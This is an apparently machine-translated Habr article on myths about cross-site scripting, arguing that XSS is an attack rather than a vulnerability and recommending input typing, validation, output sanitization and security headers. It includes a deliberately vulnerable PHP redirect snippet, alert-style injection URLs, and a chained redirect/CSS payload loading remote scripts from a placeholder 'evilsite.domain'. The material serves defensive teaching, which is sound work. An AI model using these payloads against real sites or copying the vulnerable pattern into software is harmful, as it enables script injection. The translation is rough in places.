I must admit that reading comments on Habré to almost any posts describing the next XSS on any popular service or website can depress anyone who is somehow connected with the security of web applications. Given the myths and misconceptions about cross-site scripting that are common among developers, it is not surprising that it is one of the most common web application security problems to date: according to a
report from Positive Technologies for 2010-2011 , XSS were 40% of the analyzed web applications, and from
the Firehost report for the second quarter of 2012, it follows that XSS accounted for 27% of the number of attacks registered by the hoster.
And since you can zaminusovat this post for only one of its title, I will hasten to explain: cross-site scripting is not really a vulnerability, but only because it is an attack. What is the difference, why is it important, how to deal with all this, and what other myths and delusions are common about XSS - we read under the cut.
All misconceptions are formulated in the headings, the order is arbitrary, any coincidences of examples of specific attacks and vulnerabilities with real-life ones are random and unintended.
')
XSS - Vulnerability
As mentioned above, this is not the case. Cross-site scripting is an attack, and both according to the
OWASP version, and according to the
WASC version (although of course we do not
accept the classification
manuals ). In other words, XSS is only one of the possible ways to exploit a particular class of vulnerability. For example, the following code contains only one vulnerability, but is susceptible to attacks of several classes at once:
<?php header( 'Refresh: 5; url=' . $_GET['url']); ?> <html> <head> <meta http-equiv="refresh" content="5;url=<?=$_GET['url']?>"></meta> </head> </html>
First, this code is subject to an attack of
abuse of redirection functionality , which has nothing to do with XSS. Secondly, a request of the form
http://localhost/?url="><script>alert("XSS")</script><!--
interseite script execution
http://localhost/?url="><script>alert("XSS")</script><!--
easily and naturally implemented. Thirdly, if the web - the application will be deployed in an environment that uses the canonical PHP version lower than 4.4.2 or 5.1.2, or a number of third-party PHP implementations, this code will also be vulnerable to
splitting and
hiding HTTP responses (and the security of the web application should not depend on the security of the environment as much as possible).
The difference between a vulnerability and an attack is that eliminating a vulnerability can get rid of all the attacks that exploit it, but eliminating a specific attack does not eliminate the vulnerability itself. A simple example: if we, considering a given XSS as a vulnerability, eliminate it with the help of URL-coding of each fragment of the URL'A script, then the possibility of conducting an attack to abuse the redirection functionality will not affect it at all - the attacker will still be able to redirect the user to arbitrary, correctly formed URL. Instead of fighting the consequences, we must overcome the cause, namely, eliminate the very one vulnerability that allows all these attacks to be carried out. In this case, the vulnerability lies in the fact that the url GET parameter is not processed properly either when it is sent to the script by the web server or before it is used in the output. I beg to love and complain: this vulnerability belongs to the classes of incorrect processing of
input and
output data and is the most common vulnerability, due to which it is possible to conduct the majority of known attacks today. Therefore, in order to eliminate this vulnerability, it is necessary to ensure the correct and sufficient processing of both types of data, while it is obvious that in this case URL coding is not sufficient. We will return to this issue later.
XSS is passive and active.
“When it becomes completely boring for you - an argument about terminology with colleagues” (C). But here is a matter of principle, I'm sorry. I do not know thanks to whom, this gay classification was imposed on Russian-speaking developers (it is believed that the article on XSS in the Russian Wikipedia contributed to its spread), but this separation, although it does take place, is nonetheless completely useless, since does not reflect all the properties of a specific XSS that are really significant in terms of analyzing the security of a web application and eliminating the corresponding vulnerabilities. It is traditionally and mistakenly assumed that XSS can be passive (requiring you to transfer a specially crafted link to the user and convince him to go through it) and active (stored on the server and triggered without unnecessary gestures by the user). However, consider the following example: suppose that in the Habr engine there is a vulnerability that allows you to go only beyond the
src
attribute of the
<a>
tag in the text of habratopic, but not allowing you to go beyond the tag. It is clear that this vulnerability can be used to conduct an XSS attack, defining a handler for pointing the cursor on a link, clicking on it, etc. Question: passive or active is such an attack? On the one hand, the link is stored on the server, it does not need to be delivered to the attacked users, seemingly active. On the other hand, for a successful attack, additional user actions are necessary, which is typical only for passive attacks. Paradox? That is why, XSS is usually classified according to two criteria: vector and mode of action. The second is precisely those “active / passive” ones, however, with more distinct formulations: XSS is active and does not require any extra actions from the user in terms of the functionality of the web application, unlike passive ones. And by impact vector, XSS is divided into a reflected (returned by the server in response to the same request in which the exploitation vector was transmitted), stable (stored on the server and available in all replies to the same query that does not contain the exploitation vector) and based on the object model of the document (which is possible without sending any requests to the server). Thus, the correct answer to the question of classifying a given example of an attack is: “steady-passive”.
XSS is an attack on a user and is aimed at the execution of an arbitrary script in his browser
Obviously, this is not entirely true. In order to execute an arbitrary script in the victim’s browser, it would be enough to lure it to a specially prepared page located on the server controlled by the attacker. XSS, on the other hand, is aimed not just at executing an arbitrary scenario, but at executing it in the context of the source of a specific site in order to circumvent the uniform source policies (
Same Origin Policy, SOP ) and, as a result, to gain access to the data and functionality of the client part of the web application within user session and with the rights of its user. This is an attack, first of all, on a web application that realizes the threat in it, and not in the user's browser.
At the
PHDays 2012 conference, during the “
Web 2.0 Security. Advanced Techniques ” section, its host Anders Ryancho asked the audience a simple question: “raise your hands for those who know what a single source policy is.” As a person present, I am ready to confirm: a third of the audience, which consists entirely of web developers and security experts, raised their hands on the force. In the video, this historical moment is, it is a pity that the entire audience at this moment did not hit the frame. Frankly, I do not quite understand how you can be a developer or an expert on web security and don’t know about the basic mechanism for protecting modern browsers, so I decided for myself that the people were just too shy to raise their hand in front of a foreigner. However, even a simple overview of these policies is not a task for a couple of paragraphs, so I can send all those interested in the second part of the e-book "
Browser Security Handbook " by Michael Zalewski. Even more deeply, this topic is covered in "
The Tangled Web " by the same author. By the way, both are recommended for reading by anyone who is related to web development or web application security analysis.
Fighting XSS is a user's problem, and indeed XSS is not serious
It is not entirely clear why this attack on a web application (see above) suddenly became a problem for the user, not the owner or developers of this application. Here, the question is rather what is their position in ensuring the safe work of users. The risks associated with the implementation of XSS are indeed often reputable. However, if we talk about how serious the consequences of successful XSS can be for users, I recommend watching the report of my colleague Denis Baranov “Root through XSS” presented at the ZeroNights 2011 conference and dedicated to obtaining privileged access to web developers' computers through an inter-site attack. run scripts (unfortunately, only
slides are available, but the general idea, I think it will be clear without video). How bad will the damage to the reputation of the resource be if, with the help of XSS on its client side, attackers will have unlimited access to the computers of its users? Taking into account the fact that the means that turn the mass XSS into violinistding has long been there: take, at least, the same
BeEF . In addition, we should not forget that from the point of view of XSS, web application administrators are exactly the same users as everyone else (whose problems are supposedly fighting this class of attacks, yeah).
XSS is possible only as a result of injection into HTML or client script
Not only. For example, one of the ways to use the already mentioned HTTP response split attack is to embed an HTML document (and therefore client scripts, if necessary) directly into the HTTP header subject to injection. The abuse of redirection functionality can be used to redirect the browser to URLs using the data: or javascript: scheme. Moreover, it is possible and more obscure use of attacks on redirection in order to conduct XSS. For example, in our web application, in addition to the entry point, with the redirection problem that has already been addressed (available at
/redirect.php?url=
), there is also a point with the following code:
<html> <head> <link rel="stylesheet" href="/themes/<?=$theme?>.css" type="text/css" /> </head>
At the same time, processing the
$theme
variable obtained from the parameters of a GET request is reduced to removing all quotes from it, as well as backslashes and tags (just in case), which makes it impossible for an attacker to get out of the href attribute. However, this is not required for XSS. Using
$theme
as the
$theme
parameter
../redirect.php?url=http://evilsite.domain/evilstylesheet
attacker can embed an arbitrary style sheet into the page. Using a sheet of content for IE or FF
body { behavior:url(../redirect.php?url=http://evilsite.domain/evilscript.htc); }
and
body { -moz-binding: url(../redirect.php?url=http://evilsite.domain/evilscript.xml#evilcode); }
respectively, and placing on your server the evilscript.htc files:
<PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { alert("XSS"); } </SCRIPT>
and evilscript.xml:
<?xml version="1.0"?> <bindings xmlns="http://www.mozilla.org/xbl" xmlns:html="http://www.w3.org/1999/xhtml"> <binding id="mycode"> <implementation> <constructor> alert("XSS"); </constructor> </implementation> </binding> </bindings>
He is achieving successful XSS for users of these two browsers. Of course, the same applies to the possibility of injecting directly into the definition of styles.
UPD: As
suggested in the comments, -moz-binding recently
ordered to live a long time , alas.
Most of the XSS vectors available to the attacker in various browsers and HTML versions are listed on the
HTML5 Security Cheatsheet website . There you can also find an exhaustive answer to the question voiced in the heading of this section.
The framework I use has automatic XSS protection built in, so I don't need to worry about it.
Indeed, in many modern frameworks such protection is implemented. The XSS Filtering engine in Code Igniter, the regular functionality of templating engines in Django and RoR, Web Protection Library and the Request Validation mechanism in ASP.NET/MVC, etc. etc. This is certainly great and it would be foolish not to use this functionality. It is just as silly as not to take into account that:
- no server framework is able to protect the web application from DOM-based XSS;
- none of the existing mechanisms of automatic protection against XSS is universal and devoid of any restrictions that must be considered;
- the functionality implemented by these mechanisms is aimed at combating a specific class of attacks and cannot protect against the appearance of insufficient data processing in the code of vulnerabilities;
Therefore, you still need to take care, just in some frameworks it will not be a chore and will require significant time-consuming.
To eliminate XSS, it suffices to escape all lines that fall into an HTML document.
Not enough, the above have already considered why. We need to eliminate not XSS, but the vulnerability that caused it, which leads us to the need to ensure secure data processing. Since this topic draws on a separate (and rather rather big) article, I will list the main stages of the implementation of such processing:
Determining the degree of confidence in the data
First of all, it is necessary to identify all data streams, the integrity or authenticity of which is not controlled within the considered component of the web application. The component of a web application, as a rule (although not always), refers to the elements of its server or client part that are executed within the framework of a single OS process.
In the above example, the untrusted (and only) data is the url parameter, which is obtained from the GET request string.
Typing all untrusted data
As close as possible to the place of appearance of such data in the component, it is necessary to ensure their reduction to the expected types. In static languages, this is implemented, in fact, by casting to a type or by creating an instance of this type based on deserialization or parsing of the data being checked. Moreover, in most modern frameworks built in static languages, this functionality is already implemented in the binding mechanisms of query parameters to model objects. In dynamic languages, everything is somewhat sadder, because in fact, there it is possible to speak only about the imitation of a cast (which, nevertheless, must be implemented). Nevertheless, a competent implementation of even such a conditional typing will guarantee that the data of exactly those types that it is designed to work with will be used for our component. All further work with the data inside the component should be carried out only through objects created on the basis of the input data. It is important to remember that the main principle of the typing stage is the smallest possible number of string-type objects at its output. URLs, email addresses, date, time, etc. after typing, they must be objects of specific types other than string ones. In the form of rows, only the data that is actually a string should be presented, i.e. which may actually contain arbitrary full alphanumeric text.
In our case, it suffices to use the parse_url () function and implement a check for the appearance of extra underscores in the elements of the resulting array, which indicate the presence of forbidden characters in the original URL (respectively, terminating the typing with an error if such characters were detected or if parse_url () returned FALSE). In the event that the query key is present in the resulting array, it is also necessary to parse it with parse_str () and replace it with the resulting associative array with the query parameters.
Validation of all typed untrusted data
Immediately after typing, the semantics of the obtained objects should be checked for compliance with the component functional. For example, for integer types or date / time - this will be a range check (hardly any negative page numbers or remittance numbers appear in it correspond to functional expectations), for string ones, in most cases, it will suffice to check for regular expressions, and for objects of more complex types, it is necessary to implement a check of the semantics of each of its fields and properties. Any validation checks associated with validation should always be based on the whitelist principle, i.e. the semantics of the data must meet the allowed criteria, and not vice versa. The purpose of this stage is to obtain a guarantee that all the data inside the component will correspond to the functionality implemented in it and will not be able to violate it.
Suppose that in our "web application" redirection can only be carried out within its domain. In this case, we need to make sure that in the array obtained as a result of parse_url (), only the path, query and fragment keys are present. The discovery of any other keys must result in a validation error and the termination of processing the request, unless the scheme, host, and port indicate the domain of the web application. In a more general case, it will be quite cool if the routing mechanism used in the web application also allows us to check the path for a match to a truly existing controller. And it’s really cool if the same can be done with the parameters in the query (not to mention the fragment).
Sanitize Output
In all places where validated and typed objects leave the component (or where output data are based on them), it is necessary to ensure that they are reduced to a form that is safe for the receiving party. As a rule, this is achieved by removing from them unsafe elements (filtering) or converting them to safe equivalents (screening). Sanitization must be implemented adequately to the place where the data will end up. So, in the case of the formation of an HTML document on their basis, the ways of correct screening of data falling between tags, inside tags, inside specific attributes of tags, in the text of client scripts or style definitions will be different. In other words, htmlspecialchars () is not a universal means of screening, which will always and everywhere suffice.
In our case, it is enough to generate the correct URL based on the fields obtained at the previous stages of the object, using the http_build_query () functions to build the query part and url_encode () when generating path elements (or using http_build_url () and http_build_str () from pecl_http).
As a matter of fact, these rules are relevant for any attacks caused by the vulnerability of this class. For example, for
implementations of SQL statements ,
OS commands , etc. It should also be noted that although most developers have long been aware that the data that the server receives from the client cannot be trusted, almost no one thinks that the opposite is also true, and for the same reasons.
However, if secure data processing were also implemented on the client side, this would minimize the risks of client attacks associated with exploiting server vulnerabilities.To some, these rules may seem redundant and unnecessary, but in a real (read: large and complex) web application, any other way to get rid of XSS on the topic “here it’s enough just ...” will be a struggle against the attack, and not with vulnerability. With consequences that sooner or later turn into concrete numbers in the reports of information security companies.On the rights of an epilogue: it turns out, you do not need to fight attacks?
Still as needed. Simply resisting attacks should go as a second echelon of protection and should not be used as a means of eliminating vulnerabilities. Finally, I will give one more advice on how to significantly complicate the task of an attacker on the client side (not just XSS). All server responses should contain the following headers:X-Content-Type-Options: nosniffmsdn.microsoft.com/en-us/library/ie/gg622941 (v = vs.85) .aspxX-XSS-Protection: 1; mode = blockmsdn.microsoft.com/en-us/library/dd565647 (v = vs.85) .aspxX-Frame-Options: DENYblogs.msdn.com/b/ieinternals/archive/2010/03/30/ combating-clickjacking-with-x-frame-options.aspxX-Content-Security-Policy:[the value of this header must be formed on the basis of the technical requirements for the site's functionality, in accordance with dvcs.w3.org/hg/content-security-policy/raw-file/tip/csp-specification.dev.html ]Strict-Transport-Security : max-age = expireTimedeveloper.mozilla.org/en/Security/HTTP_Strict_Transport_Security Toclarify the purpose of each, duplicating the text on the links given - I think that there is no special meaning.Good luck!